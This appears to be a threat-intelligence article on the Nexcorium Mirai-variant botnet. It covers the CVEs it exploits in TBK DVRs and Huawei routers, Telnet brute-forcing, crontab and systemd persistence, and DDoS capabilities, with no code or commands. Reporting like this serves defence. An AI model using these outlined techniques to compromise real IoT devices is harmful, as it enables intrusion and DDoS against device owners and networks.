Nexcorium Botnet

Cybersecurity investigations reveal that threat actors are actively exploiting security weaknesses in TBK DVR systems and end-of-life TP-Link Wi-Fi routers to deploy variants of the Mirai botnet. These devices, often overlooked in security strategies, present attractive entry points due to outdated firmware, weak configurations, and infrequent patching. Their widespread deployment further amplifies their value as targets in large-scale cyberattacks.

Exploiting Known Vulnerabilities for Initial Access

The campaign targeting TBK DVR devices leverages CVE-2024-3721, a medium-severity command injection vulnerability (CVSS score: 6.3) affecting DVR-4104 and DVR-4216 models. By exploiting this flaw, attackers deliver a Mirai-based payload known as Nexcorium. This vulnerability has not gone unnoticed in prior campaigns; it has previously been used to deploy both Mirai variants and the emerging RondoDox botnet.

In addition, earlier research highlighted a loader-as-a-service ecosystem responsible for distributing multiple malware families, including RondoDox, Mirai, and Morte, by abusing weak credentials and legacy vulnerabilities across routers, IoT devices, and enterprise applications.

Infection Chain and Payload Deployment

The attack sequence begins with the exploitation of the DVR vulnerability to deploy a downloader script. This script identifies the target system’s Linux architecture and executes the appropriate botnet payload. Once activated, the malware signals compromise by displaying a message indicating that control has been established.

Nexcorium mirrors the structural design of traditional Mirai variants, incorporating encoded configuration data, system monitoring mechanisms, and dedicated modules for launching distributed denial-of-service attacks.

Lateral Movement and Persistence Techniques

The malware extends its reach within networks by exploiting additional vulnerabilities, including CVE-2017-17215, targeting Huawei HG532 devices. It also employs brute-force techniques using embedded credential lists to compromise other systems via Telnet access.

Once access is achieved, the malware performs several actions:

• Establishes a shell session on the compromised host
• Configures persistence using crontab and systemd services
• Connects to a remote Command-and-Control server for instructions
• Deletes the original binary to reduce forensic visibility

These steps ensure continued control while minimizing the chances of detection and analysis.

Botnet Capabilities and Operational Impact

After securing persistence, Nexcorium enables attackers to execute a range of DDoS attacks using multiple protocols, including:

UDP
TCP
SMTP

This multi-vector capability allows for flexible and high-impact attack scenarios, making the botnet a significant threat to targeted infrastructure.

Persistent Threat Landscape and Future Risks

Nexcorium exemplifies the evolution of IoT-focused botnets, combining exploit reuse, cross-architecture compatibility, and robust persistence mechanisms. Its integration of known vulnerabilities alongside aggressive brute-force tactics demonstrates a high degree of adaptability.

The continued reliance on default credentials and unpatched devices ensures that IoT ecosystems will remain a critical weak point. Without significant improvements in device security practices, these systems will continue to fuel large-scale botnet operations and disrupt global network stability.